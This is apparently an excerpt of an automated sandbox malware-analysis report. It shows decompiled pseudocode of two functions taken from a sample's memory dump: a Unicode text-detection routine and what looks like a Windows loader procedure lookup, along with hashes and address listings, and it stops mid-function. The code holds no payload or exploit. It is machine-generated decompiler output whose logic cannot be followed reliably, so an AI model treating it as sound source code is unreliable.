Instruction ID: fabe4d4ab7b509f54ade40e2d2ec5d35594fdd645bbbcc043c86a55ed514fb5c
Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction Fuzzy Hash: 5AD1C1317147268BEF26CE6DC5C066AFBE1AF85354F2C85A8DC65CB246E731D8438790

Uniqueness

Uniqueness Score: -1.00%

Function 01710D20 Relevance: .4, Instructions: 372
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E01710D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x1806d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x1806920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x1806920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x1711174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M01711160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}

0x01710d2b
0x01710d2e
0x01710d32
0x01710d39
0x01710d3b
0x01710d3d
0x01710d3f
0x01710d46
0x01710d4d
0x01710d54
0x01710d5b
0x01710d62
0x01710d69
0x01710d70
0x01710d77
0x01710d7e
0x01710d85
0x01710d88
0x01710d8b
0x01710d8e
0x01710d91
0x01710d94
0x01710d97
0x01710d9a
0x01710d9d
0x01710da6
0x017110e9
0x017110ee
0x01710db9
0x01710db9
0x01710dbc
0x0176e9c7
0x0176e9ca
0x0176e9cd
0x0176e9d0
0x0176e9dd
0x0176e9dd
0x01710dec
0x01710dec
0x01710dee
0x01710df3
0x01710ebf
0x01710ec0
0x00000000
0x01710df9
0x01710df9
0x01710e1e
0x01710e21
0x01710e24
0x01710e27
0x01710e2a
0x01710e2d
0x01710e30
0x01710e36
0x01711040
0x01711043
0x01711049
0x01711049
0x01710e3c
0x01710e3f
0x01711007
0x0171100a
0x01711010
0x01711010
0x0171100a
0x01710e3f
0x01710e58
0x01710e5d
0x01711000
0x01710e63
0x01710e63
0x01710e63
0x01710e67
0x01710e69
0x01710e69
0x01710e6d
0x01710e70
0x01710e74
0x01710e76
0x01710e76
0x01710e7a
0x01710e7c
0x01710e7c
0x01710e83
0x01710e86
0x01710e87
0x01710e89
0x01710e8b
0x01710e91
0x01710e00
0x01710e03
0x01710e03
0x01710e07
0x01710e0f
0x00000000
0x00000000
0x00000000
0x00000000
0x01710e0f
0x01710e97
0x01710e9c
0x0171113e
0x01711141
0x01711143
0x01710eb1
0x01710eb1
0x01710eb4
0x01710eb6
0x01711110
0x01711112
0x0176ea25
0x0176ea25
0x01710ec3
0x01710ec3
0x01710ecb
0x017110fe
0x01710ed1
0x01710ed1
0x01710ed1
0x01710ed3
0x01710edb
0x0176ea2d
0x0176ea2f
0x0176ea31
0x00000000
0x00000000
0x00000000
0x00000000
0x0176ea37
0x0176ea37
0x0176ea3a
0x0176ea3e
0x0176ea47
0x0176ea4a
0x0176ea4c
0x0176ea4d
0x0176ea4d
0x0176ea4e
0x0176ea4e
0x0176ea51
0x0176ea52
0x0176ea52
0x00000000
0x01710ee1
0x01710ee1
0x01710ee1
0x01710ee3
0x01710ee3
0x01710ee6
0x01710eec
0x0176ea5b
0x0176ea5d
0x01710ef6
0x01710ef8
0x0176ea6f
0x0176ea6f
0x01710efe
0x01710efe
0x01710f03
0x0176ea7b
0x0176ea7d
0x00000000
0x00000000
0x0176ea83
0x0176ea85
0x00000000
0x00000000
0x0176ea8b
0x0176ea91
0x00000000
0x00000000
0x0176ea97
0x0176ea9a
0x0176eaa0
0x0176eaa2
0x0176eaa2
0x0176eaae
0x0176eab3
0x0176eab6
0x0176eabf
0x0176eaca
0x0176eacd
0x0176ead1
0x0176ead1
0x0176eab8
0x0176eab8
0x0176eab8
0x0176ead2
0x0176ead9
0x01710f0e
0x01710f15
0x01710f17
0x01710f17
0x01710f1e
0x01710f23
0x0176eae1
0x0176eae1
0x01710f38
0x01710f3a
0x01710f3a
0x01710f49
0x01711108
0x01711108
0x01710f5b
0x017110c7
0x017110ca
0x017110cc
0x00000000
0x00000000
0x017110dc
0x017110de
0x00000000
0x00000000
0x00000000
0x01710f61
0x01710f61
0x01710f61
0x01710f67
0x01710f6b
0x0171111d
0x0171111d
0x01710f75
0x01710f77
0x01710f77
0x01710f85
0x01710f8b
0x017110b9
0x017110bc
0x0176eae9
0x0176eae9
0x01710f91
0x01710f91
0x01710f91
0x01710f96
0x01710f98
0x01710f9a
0x01710f9a
0x01710fa6
0x0171107c
0x0171107f
0x0171108d
0x00000000
0x0171108d
0x01711081
0x01711087
0x0176eaf4
0x0176eafa
0x00000000
0x00000000
0x00000000
0x0176eb00
0x00000000
0x01710fac
0x01710fac
0x00000000
0x01710fac
0x01710fa6
0x01710f5b
0x01710f09
0x01710f09
0x00000000
0x01710f09
0x0176ea63
0x00000000
0x0176ea63
0x01710ef4
0x00000000
0x00000000
0x00000000
0x01710ef4
0x01710ebc
0x01710ebc
0x00000000
0x01710ebc
0x01710eb6
0x01711149
0x0171114c
0x0171114d
0x00000000
0x0171114d
0x01710ea4
0x01710ea7
0x00000000
0x00000000
0x00000000
0x00000000
0x01710fb7
0x01710fb7
0x01710fbc
0x01710fc9
0x01710fc9
0x01710fce
0x01711020
0x01711025
0x01711094
0x01711094
0x01711099
0x0176ea04
0x0176ea04
0x0176ea09
0x0176ea1c
0x0176ea0b
0x0176ea0b
0x0176ea0e
0x0176ea14
0x0176ea14
0x0176ea0e
0x0176ea09
0x01711027
0x01711027
0x01711155
0x0171102d
0x0171102d
0x0171102d
0x01711032
0x0176e9fc
0x0176e9fc
0x01711032
0x01711027
0x00000000
0x01711025
0x01710fd0
0x0176e9f4
0x00000000
0x0176e9f4
0x01710fd6
0x01710fd9
0x01711059
0x01711059
0x0171105e
0x0176e9ec
0x01711064
0x01711064
0x01711064
0x01711069
0x017110ac
0x0171106b
0x0171106b
0x0171106e
0x01711074
0x01711074
0x0171106e
0x01711069
0x00000000
0x0171105e
0x01710fdb
0x017110a4
0x00000000
0x017110a4
0x01710fe1
0x01710fe4
0x00000000
0x00000000
0x01710fea
0x01710ff1
0x00000000
0x01710ff8
0x00000000
0x00000000
0x0176e9e4
0x00000000
0x00000000
0x01711018
0x00000000
0x00000000
0x01711051
0x00000000
0x00000000
0x00000000
0x00000000
0x01710ff1
0x01710fbe
0x01710fc3
0x00000000
0x00000000
0x00000000
0x01710fc3
0x01710df3
0x0176e9d5
0x0176e9d7
0x01711128
0x01711128
0x0171112b
0x0171112d
0x01711133
0x01711133
0x00000000
0x0171112d
0x00000000
0x0176e9d7
0x01710dc2
0x017110f6
0x01710dd4
0x01710dd7
0x01710dda
0x01710de8
0x01710de9
0x01710de9
0x01710dda
0x00000000
0x01710dc2
0x01710dac
0x01710dae
0x01710db3
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6f5294caf47310ae3e3904a2cc0b508314b13cfd0dd8fa792cb2ca03d889deb
Instruction ID: f6a5544dc614f1b64e4399f659804b734bee44f6cb980cc843e328d294a7addd
Opcode Fuzzy Hash: b6f5294caf47310ae3e3904a2cc0b508314b13cfd0dd8fa792cb2ca03d889deb
Instruction Fuzzy Hash: FAD1C231E042598BEF28CEADC5953BDFBB5FB48300F548169EA42AB28DD77489C5CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0172D5E0 Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0172D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x180d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = L01726600(0x18052d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1807b9c; // 0x0
							_t281 = L01734620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0175F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1807b90; // 0x77d30000
								if(_t384 == 0) {
									_t353 =  *0x1807b8c; // 0x1453d80
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01732280(_t200, 0x18084d8);
									_t277 =  *0x18085f4; // 0x1451f88
									_t351 =  *0x18085f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x1451f20
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									L0172FFB0(_t287, _t353, 0x18084d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = L0176CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = L01726600(0x18052d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01727926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x180b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0179E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1808472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x180b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x180b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01732280(_t250, 0x18084d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01753898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																L0172FFB0(_t293, _t353, 0x18084d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	L017537F5(_t353, 0);
																}
																L01750413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01749B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E017402D6(_t174);
																}
																L017377F0( *0x1807b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0174C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0172EC7F(_t353);
										L017419B8(_t287, 0, _t353, 0);
										_t200 = L0171F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x180b2f8 |  *0x180b2fc) == 0 || ( *0x180b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return L0175B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x180b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E017C6B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E017C6AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E0172E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L0172EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = L01759730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
